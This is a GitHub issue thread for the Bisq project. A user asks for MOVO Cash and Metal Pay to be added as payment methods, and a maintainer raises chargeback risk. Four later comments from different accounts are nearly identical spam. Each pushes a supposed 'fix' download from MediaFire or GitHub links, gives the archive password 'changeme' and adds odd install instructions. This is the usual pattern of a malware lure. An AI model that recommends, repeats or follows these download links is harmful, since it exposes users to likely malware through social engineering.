### ISSUE TITLE
Request To Add Payment Method

### ISSUE THREAD

**Issue by thggar** [bisq-network/bisq#3841]
Request to add the following payment methods. 

MOVO Cash
https://movo.cash/

METAL Pay
https://www.metalpay.com/

These apps function similair to Cash app allowing users to send p2p instant transfers.

**Comment by wiz** [comment]
Looks interesting but don't these payment methods have chargeback risk? Bisq can only use secure payment methods with low chargeback risk. This is why CashApp was removed.

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
